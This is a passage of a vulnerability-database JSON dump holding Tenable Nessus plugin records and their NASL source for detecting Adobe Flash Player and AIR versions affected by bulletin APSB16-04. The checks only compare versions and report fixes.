(CVE-2016-0971)\n\n - Multiple memory corruption issues exist that allow a\n remote attacker to execute arbitrary code.\n (CVE-2016-0964, CVE-2016-0965, CVE-2016-0966,\n CVE-2016-0967, CVE-2016-0968, CVE-2016-0969,\n CVE-2016-0970, CVE-2016-0972, CVE-2016-0976,\n CVE-2016-0977, CVE-2016-0978, CVE-2016-0979,\n CVE-2016-0980, CVE-2016-0981)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb16-04.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe AIR version 20.0.0.260 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-0984\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/02/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/02/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/02/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:air\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"adobe_air_installed.nasl\");\n script_require_keys(\"SMB/Adobe_AIR/Version\", \"SMB/Adobe_AIR/Path\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nversion = get_kb_item_or_exit(\"SMB/Adobe_AIR/Version\");\npath = get_kb_item_or_exit(\"SMB/Adobe_AIR/Path\");\n\nversion_ui = get_kb_item(\"SMB/Adobe_AIR/Version_UI\");\nif (isnull(version_ui)) version_report = version;\nelse version_report = version_ui + ' (' + version + ')';\n\ncutoff_version = '20.0.0.233';\nfix = '20.0.0.260';\nfix_ui = '20.0';\n\nif (ver_compare(ver:version, fix:cutoff_version) <= 0)\n{\n port = get_kb_item(\"SMB/transport\");\n if (!port) port = 445;\n\n if (report_verbosity > 0)\n {\n report =\n '\\n Path : ' + path +\n '\\n Installed version : ' + version_report +\n '\\n Fixed version : ' + fix_ui + \" (\" + fix + ')' +\n '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n exit(0);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, \"Adobe AIR\", version_report, path);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-01T02:44:19", "description": "The version of Adobe Flash Player installed on the remote Windows host\nis prior or equal to version 20.0.0.286. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A type confusion error exists that allows a remote\n attacker to execute arbitrary code. (CVE-2016-0985)\n\n - Multiple use-after-free errors exist that allow a remote\n attacker to execute arbitrary code. (CVE-2016-0973,\n CVE-2016-0974, CVE-2016-0975, CVE-2016-0982,\n CVE-2016-0983, CVE-2016-0984)\n\n - A heap buffer overflow condition exist that allows an \n attacker to execute arbitrary code. 
(CVE-2016-0971)\n\n - Multiple memory corruption issues exist that allow a\n remote attacker to execute arbitrary code.\n (CVE-2016-0964, CVE-2016-0965, CVE-2016-0966,\n CVE-2016-0967, CVE-2016-0968, CVE-2016-0969,\n CVE-2016-0970, CVE-2016-0972, CVE-2016-0976,\n CVE-2016-0977, CVE-2016-0978, CVE-2016-0979,\n CVE-2016-0980, CVE-2016-0981)", "edition": 26, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-02-09T00:00:00", "title": "Adobe Flash Player <= 20.0.0.286 Multiple Vulnerabilities (APSB16-04)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-0982", "CVE-2016-0984", "CVE-2016-0979", "CVE-2016-0967", "CVE-2016-0970", "CVE-2016-0972", "CVE-2016-0969", "CVE-2016-0980", "CVE-2016-0974", "CVE-2016-0973", "CVE-2016-0966", "CVE-2016-0971", "CVE-2016-0978", "CVE-2016-0965", "CVE-2016-0975", "CVE-2016-0983", "CVE-2016-0964", "CVE-2016-0968", "CVE-2016-0976", "CVE-2016-0981", "CVE-2016-0977", "CVE-2016-0985"], "modified": "2021-02-02T00:00:00", "cpe": ["cpe:/a:adobe:flash_player"], "id": "FLASH_PLAYER_APSB16-04.NASL", "href": "https://www.tenable.com/plugins/nessus/88639", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(88639);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2019/11/20\");\n\n script_cve_id(\n \"CVE-2016-0964\",\n \"CVE-2016-0965\",\n \"CVE-2016-0966\",\n \"CVE-2016-0967\",\n \"CVE-2016-0968\",\n \"CVE-2016-0969\",\n \"CVE-2016-0970\",\n \"CVE-2016-0971\",\n \"CVE-2016-0972\",\n \"CVE-2016-0973\",\n \"CVE-2016-0974\",\n \"CVE-2016-0975\",\n \"CVE-2016-0976\",\n \"CVE-2016-0977\",\n \"CVE-2016-0978\",\n \"CVE-2016-0979\",\n \"CVE-2016-0980\",\n \"CVE-2016-0981\",\n \"CVE-2016-0982\",\n \"CVE-2016-0983\",\n \"CVE-2016-0984\",\n \"CVE-2016-0985\"\n );\n\n script_name(english:\"Adobe Flash Player <= 20.0.0.286 Multiple Vulnerabilities (APSB16-04)\");\n script_summary(english:\"Checks the version of Flash 
Player.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host has a browser plugin installed that is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Adobe Flash Player installed on the remote Windows host\nis prior or equal to version 20.0.0.286. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A type confusion error exists that allows a remote\n attacker to execute arbitrary code. (CVE-2016-0985)\n\n - Multiple use-after-free errors exist that allow a remote\n attacker to execute arbitrary code. (CVE-2016-0973,\n CVE-2016-0974, CVE-2016-0975, CVE-2016-0982,\n CVE-2016-0983, CVE-2016-0984)\n\n - A heap buffer overflow condition exist that allows an \n attacker to execute arbitrary code. (CVE-2016-0971)\n\n - Multiple memory corruption issues exist that allow a\n remote attacker to execute arbitrary code.\n (CVE-2016-0964, CVE-2016-0965, CVE-2016-0966,\n CVE-2016-0967, CVE-2016-0968, CVE-2016-0969,\n CVE-2016-0970, CVE-2016-0972, CVE-2016-0976,\n CVE-2016-0977, CVE-2016-0978, CVE-2016-0979,\n CVE-2016-0980, CVE-2016-0981)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb16-04.html\");\n # http://helpx.adobe.com/flash-player/kb/archived-flash-player-versions.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0cb17c10\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe Flash Player version 20.0.0.306 or later.\n\nAlternatively, Adobe has made version 18.0.0.329 available for those\ninstallations that cannot be upgraded to the latest version.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n 
script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-0984\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/02/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/02/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/02/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:flash_player\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"flash_player_installed.nasl\");\n script_require_keys(\"SMB/Flash_Player/installed\");\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/Flash_Player/installed\");\n\n# Identify vulnerable versions.\ninfo = \"\";\nvariants = make_list(\n \"Plugin\",\n \"ActiveX\",\n \"Chrome\",\n \"Chrome_Pepper\"\n);\n\n# we're checking for versions less than *or equal to* the cutoff!\nforeach variant (variants)\n{\n vers = get_kb_list(\"SMB/Flash_Player/\"+variant+\"/Version/*\");\n files = get_kb_list(\"SMB/Flash_Player/\"+variant+\"/File/*\");\n\n if(isnull(vers) || isnull(files))\n continue;\n\n foreach key (keys(vers))\n {\n ver = vers[key];\n if(isnull(ver))\n continue;\n\n vuln = FALSE;\n\n # Chrome Flash <= 20.0.0.286\n if(variant == \"Chrome_Pepper\" &&\n ver_compare(ver:ver,fix:\"20.0.0.286\",strict:FALSE) <= 0\n ) vuln = TRUE;\n\n # <= 18.0.0.326\n if(variant != \"Chrome_Pepper\" &&\n ver_compare(ver:ver,fix:\"18.0.0.326\",strict:FALSE) <= 0\n 
) vuln = TRUE;\n\n # 19 <= 20.0.0.286\n else if(variant != \"Chrome_Pepper\" && ver =~ \"^(?:19|[2-9]\\d)\\.\")\n {\n if (variant == \"ActiveX\" && ver_compare(ver:ver,fix:\"20.0.0.286\",strict:FALSE) <= 0)\n vuln = TRUE;\n else if (ver_compare(ver:ver,fix:\"20.0.0.286\",strict:FALSE) <= 0)\n vuln = TRUE;\n }\n\n if(vuln)\n {\n num = key - (\"SMB/Flash_Player/\"+variant+\"/Version/\");\n file = files[\"SMB/Flash_Player/\"+variant+\"/File/\"+num];\n if (variant == \"Plugin\")\n {\n info += '\\n Product : Browser Plugin (for Firefox / Netscape / Opera)';\n fix = \"20.0.0.306 / 18.0.0.329\";\n }\n else if (variant == \"ActiveX\")\n {\n info += '\\n Product : ActiveX control (for Internet Explorer)';\n fix = \"20.0.0.306 / 18.0.0.329\";\n }\n else if (\"Chrome\" >< variant)\n {\n info += '\\n Product : Browser Plugin (for Google Chrome)';\n if(variant == \"Chrome\")\n fix = \"Upgrade to a version of Google Chrome running Flash Player 20.0.0.306\";\n }\n info += '\\n Path : ' + file +\n '\\n Installed version : ' + ver;\n if (variant == \"Chrome_Pepper\")\n info += '\\n Fixed version : 20.0.0.306 (Chrome PepperFlash)';\n else if(!isnull(fix))\n info += '\\n Fixed version : '+fix;\n info += '\\n';\n }\n }\n}\n\nif (info)\n{\n port = get_kb_item(\"SMB/transport\");\n if (!port) port = 445;\n\n if (report_verbosity > 0) security_hole(port:port, extra:info);\n else security_hole(port);\n}\nelse\n{\n if (thorough_tests)\n exit(0, 'No vulnerable versions of Adobe Flash Player were found.');\n else\n exit(1, 'Google Chrome\\'s built-in Flash Player may not have been detected because the \\'Perform thorough tests\\' setting was not enabled.');\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-01T03:42:57", "description": "The version of Adobe AIR installed on the remote Mac OS X host is\nprior or equal to version 20.0.0.233. 
It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A type confusion error exists that allows a remote\n attacker to execute arbitrary code. (CVE-2016-0985)\n\n - Multiple use-after-free errors exist that allow a remote\n attacker to execute arbitrary code. (CVE-2016-0973,\n CVE-2016-0974, CVE-2016-0975, CVE-2016-0982,\n CVE-2016-0983, CVE-2016-0984)\n\n - A heap buffer overflow condition exist that allows an \n attacker to execute arbitrary code. (CVE-2016-0971)\n\n - Multiple memory corruption issues exist that allow a\n remote attacker to execute arbitrary code.\n (CVE-2016-0964, CVE-2016-0965, CVE-2016-0966,\n CVE-2016-0967, CVE-2016-0968, CVE-2016-0969,\n CVE-2016-0970, CVE-2016-0972, CVE-2016-0976,\n CVE-2016-0977, CVE-2016-0978, CVE-2016-0979,\n CVE-2016-0980, CVE-2016-0981)", "edition": 26, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-02-09T00:00:00", "title": "Adobe AIR for Mac <= 20.0.0.233 Multiple Vulnerabilities (APSB16-04)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-0982", "CVE-2016-0984", "CVE-2016-0979", "CVE-2016-0967", "CVE-2016-0970", "CVE-2016-0972", "CVE-2016-0969", "CVE-2016-0980", "CVE-2016-0974", "CVE-2016-0973", "CVE-2016-0966", "CVE-2016-0971", "CVE-2016-0978", "CVE-2016-0965", "CVE-2016-0975", "CVE-2016-0983", "CVE-2016-0964", "CVE-2016-0968", "CVE-2016-0976", "CVE-2016-0981", "CVE-2016-0977", "CVE-2016-0985"], "modified": "2021-02-02T00:00:00", "cpe": ["cpe:/a:adobe:air"], "id": "MACOSX_ADOBE_AIR_APSB16-04.NASL", "href": "https://www.tenable.com/plugins/nessus/88640", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(88640);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2019/11/20\");\n\n script_cve_id(\n \"CVE-2016-0964\",\n \"CVE-2016-0965\",\n \"CVE-2016-0966\",\n \"CVE-2016-0967\",\n \"CVE-2016-0968\",\n \"CVE-2016-0969\",\n \"CVE-2016-0970\",\n \"CVE-2016-0971\",\n 
\"CVE-2016-0972\",\n \"CVE-2016-0973\",\n \"CVE-2016-0974\",\n \"CVE-2016-0975\",\n \"CVE-2016-0976\",\n \"CVE-2016-0977\",\n \"CVE-2016-0978\",\n \"CVE-2016-0979\",\n \"CVE-2016-0980\",\n \"CVE-2016-0981\",\n \"CVE-2016-0982\",\n \"CVE-2016-0983\",\n \"CVE-2016-0984\",\n \"CVE-2016-0985\"\n );\n\n script_name(english:\"Adobe AIR for Mac <= 20.0.0.233 Multiple Vulnerabilities (APSB16-04)\");\n script_summary(english:\"Checks the version of AIR.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Mac OS X host has a browser plugin installed that is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Adobe AIR installed on the remote Mac OS X host is\nprior or equal to version 20.0.0.233. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A type confusion error exists that allows a remote\n attacker to execute arbitrary code. (CVE-2016-0985)\n\n - Multiple use-after-free errors exist that allow a remote\n attacker to execute arbitrary code. (CVE-2016-0973,\n CVE-2016-0974, CVE-2016-0975, CVE-2016-0982,\n CVE-2016-0983, CVE-2016-0984)\n\n - A heap buffer overflow condition exist that allows an \n attacker to execute arbitrary code. 
(CVE-2016-0971)\n\n - Multiple memory corruption issues exist that allow a\n remote attacker to execute arbitrary code.\n (CVE-2016-0964, CVE-2016-0965, CVE-2016-0966,\n CVE-2016-0967, CVE-2016-0968, CVE-2016-0969,\n CVE-2016-0970, CVE-2016-0972, CVE-2016-0976,\n CVE-2016-0977, CVE-2016-0978, CVE-2016-0979,\n CVE-2016-0980, CVE-2016-0981)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb16-04.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe AIR version 20.0.0.260 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-0984\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/02/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/02/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/02/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:air\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_adobe_air_installed.nasl\");\n script_require_keys(\"MacOSX/Adobe_AIR/Version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nkb_base = \"MacOSX/Adobe_AIR\";\nversion = get_kb_item_or_exit(kb_base+\"/Version\");\npath = get_kb_item_or_exit(kb_base+\"/Path\");\n\n# nb: we're checking for versions less than *or equal to* the cutoff!\ncutoff_version = '20.0.0.233';\nfixed_version_for_report = '20.0.0.260';\n\nif (ver_compare(ver:version, fix:cutoff_version, strict:FALSE) <= 0)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Path : ' + path +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed_version_for_report +\n '\\n';\n security_hole(port:0, extra:report);\n }\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, \"Adobe AIR\", version, path);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-01T03:46:12", "description": "The version of Adobe Flash Player installed on the remote Mac OS X\nhost is prior or equal to version 20.0.0.286. It is, therefore,\naffected by multiple vulnerabilities :\n\n - A type confusion error exists that allows a remote\n attacker to execute arbitrary code. (CVE-2016-0985)\n\n - Multiple use-after-free errors exist that allow a remote\n attacker to execute arbitrary code. (CVE-2016-0973,\n CVE-2016-0974, CVE-2016-0975, CVE-2016-0982,\n CVE-2016-0983, CVE-2016-0984)\n\n - A heap buffer overflow condition exist that allows an \n attacker to execute arbitrary code. 
(CVE-2016-0971)\n\n - Multiple memory corruption issues exist that allow a\n remote attacker to execute arbitrary code.\n (CVE-2016-0964, CVE-2016-0965, CVE-2016-0966,\n CVE-2016-0967, CVE-2016-0968, CVE-2016-0969,\n CVE-2016-0970, CVE-2016-0972, CVE-2016-0976,\n CVE-2016-0977, CVE-2016-0978, CVE-2016-0979,\n CVE-2016-0980, CVE-2016-0981)", "edition": 26, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-02-09T00:00:00", "title": "Adobe Flash Player for Mac <= 20.0.0.286 Multiple Vulnerabilities (APSB16-04)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-0982", "CVE-2016-0984", "CVE-2016-0979", "CVE-2016-0967", "CVE-2016-0970", "CVE-2016-0972", "CVE-2016-0969", "CVE-2016-0980", "CVE-2016-0974", "CVE-2016-0973", "CVE-2016-0966", "CVE-2016-0971", "CVE-2016-0978", "CVE-2016-0965", "CVE-2016-0975", "CVE-2016-0983", "CVE-2016-0964", "CVE-2016-0968", "CVE-2016-0976", "CVE-2016-0981", "CVE-2016-0977", "CVE-2016-0985"], "modified": "2021-02-02T00:00:00", "cpe": ["cpe:/a:adobe:flash_player"], "id": "MACOSX_FLASH_PLAYER_APSB16-04.NASL", "href": "https://www.tenable.com/plugins/nessus/88641", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(88641);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2019/11/20\");\n\n script_cve_id(\n \"CVE-2016-0964\",\n \"CVE-2016-0965\",\n \"CVE-2016-0966\",\n \"CVE-2016-0967\",\n \"CVE-2016-0968\",\n \"CVE-2016-0969\",\n \"CVE-2016-0970\",\n \"CVE-2016-0971\",\n \"CVE-2016-0972\",\n \"CVE-2016-0973\",\n \"CVE-2016-0974\",\n \"CVE-2016-0975\",\n \"CVE-2016-0976\",\n \"CVE-2016-0977\",\n \"CVE-2016-0978\",\n \"CVE-2016-0979\",\n \"CVE-2016-0980\",\n \"CVE-2016-0981\",\n \"CVE-2016-0982\",\n \"CVE-2016-0983\",\n \"CVE-2016-0984\",\n \"CVE-2016-0985\"\n );\n\n script_name(english:\"Adobe Flash Player for Mac <= 20.0.0.286 Multiple Vulnerabilities (APSB16-04)\");\n script_summary(english:\"Checks the 
version of Flash Player.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Mac OS X host has a browser plugin installed that is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Adobe Flash Player installed on the remote Mac OS X\nhost is prior or equal to version 20.0.0.286. It is, therefore,\naffected by multiple vulnerabilities :\n\n - A type confusion error exists that allows a remote\n attacker to execute arbitrary code. (CVE-2016-0985)\n\n - Multiple use-after-free errors exist that allow a remote\n attacker to execute arbitrary code. (CVE-2016-0973,\n CVE-2016-0974, CVE-2016-0975, CVE-2016-0982,\n CVE-2016-0983, CVE-2016-0984)\n\n - A heap buffer overflow condition exist that allows an \n attacker to execute arbitrary code. (CVE-2016-0971)\n\n - Multiple memory corruption issues exist that allow a\n remote attacker to execute arbitrary code.\n (CVE-2016-0964, CVE-2016-0965, CVE-2016-0966,\n CVE-2016-0967, CVE-2016-0968, CVE-2016-0969,\n CVE-2016-0970, CVE-2016-0972, CVE-2016-0976,\n CVE-2016-0977, CVE-2016-0978, CVE-2016-0979,\n CVE-2016-0980, CVE-2016-0981)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb16-04.html\");\n # http://helpx.adobe.com/flash-player/kb/archived-flash-player-versions.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0cb17c10\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe Flash Player version 20.0.0.306 or later.\n\nAlternatively, Adobe has made version 18.0.0.329 available for those\ninstallations that cannot be upgraded to the latest version.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n 
script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-0984\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/02/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/02/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/02/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:flash_player\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_flash_player_installed.nasl\");\n script_require_keys(\"MacOSX/Flash_Player/Version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nversion = get_kb_item_or_exit(\"MacOSX/Flash_Player/Version\");\npath = get_kb_item_or_exit(\"MacOSX/Flash_Player/Path\");\n\nif (version =~ \"^(19|20)\\.\")\n{\n cutoff_version = \"20.0.0.286\";\n fix = \"20.0.0.306\";\n}\nelse\n{\n cutoff_version = \"18.0.0.326\";\n fix = \"18.0.0.329\";\n}\n# we're checking for versions less than or equal to the cutoff!\nif (ver_compare(ver:version, fix:cutoff_version, strict:FALSE) <= 0)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Path : ' + path +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n';\n security_hole(port:0, extra:report);\n }\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, \"Flash Player for Mac\", version, path);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-06T10:52:13", "description": "Adobe reports :\n\nThese updates resolve a type confusion vulnerability that could lead\nto code execution (CVE-2016-0985).\n\nThese updates resolve use-after-free vulnerabilities that could lead\nto code execution (CVE-2016-0973, CVE-2016-0974, CVE-2016-0975,\nCVE-2016-0982, CVE-2016-0983, CVE-2016-0984).\n\nThese updates resolve a heap buffer overflow vulnerability that could\nlead to code execution (CVE-2016-0971).\n\nThese updates resolve memory corruption vulnerabilities that could\nlead to code execution (CVE-2016-0964, CVE-2016-0965, CVE-2016-0966,\nCVE-2016-0967, CVE-2016-0968, CVE-2016-0969, CVE-2016-0970,\nCVE-2016-0972, CVE-2016-0976, CVE-2016-0977, CVE-2016-0978,\nCVE-2016-0979, CVE-2016-0980, CVE-2016-0981).", "edition": 26, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-02-11T00:00:00", "title": 
"FreeBSD : flash -- multiple vulnerabilities (5d8e56c3-9e67-4d5b-81c9-3a409dfd705f)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-0982", "CVE-2016-0984", "CVE-2016-0979", "CVE-2016-0967", "CVE-2016-0970", "CVE-2016-0972", "CVE-2016-0969", "CVE-2016-0980", "CVE-2016-0974", "CVE-2016-0973", "CVE-2016-0966", "CVE-2016-0971", "CVE-2016-0978", "CVE-2016-0965", "CVE-2016-0975", "CVE-2016-0983", "CVE-2016-0964", "CVE-2016-0968", "CVE-2016-0976", "CVE-2016-0981", "CVE-2016-0977", "CVE-2016-0985"], "modified": "2016-02-11T00:00:00", "cpe": ["cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:linux-f10-flashplugin", "p-cpe:/a:freebsd:freebsd:linux-c6-flashplugin", "p-cpe:/a:freebsd:freebsd:linux-c6_64-flashplugin"], "id": "FREEBSD_PKG_5D8E56C39E674D5B81C93A409DFD705F.NASL", "href": "https://www.tenable.com/plugins/nessus/88684", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2019 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. 
Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(88684);\n script_version(\"2.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n 